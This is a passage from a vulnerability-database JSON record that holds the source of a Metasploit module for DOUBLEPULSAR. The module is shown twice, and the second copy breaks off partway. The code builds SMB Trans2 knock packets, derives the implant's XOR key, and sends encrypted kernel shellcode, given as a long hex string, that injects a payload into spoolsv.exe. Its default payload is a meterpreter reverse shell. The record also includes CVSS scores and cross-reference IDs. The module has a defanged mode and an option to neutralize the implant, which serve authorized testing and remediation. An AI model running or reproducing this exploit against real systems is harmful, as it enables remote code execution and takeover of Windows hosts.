end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-12] #"}, "lastseen": "2021-10-12T10:30:51", "differentElements": ["sourceData"], "edition": 42}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "213e9afa3c60846143f9a4a6709b3375", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-10-12T22:41:50", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33895", 
"1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "nessus", "idList": ["700099.PRM", "700059.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96709", "SMNTC-96705", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", 
"TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-12T22:41:50", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-12T22:41:50", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => 
{\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
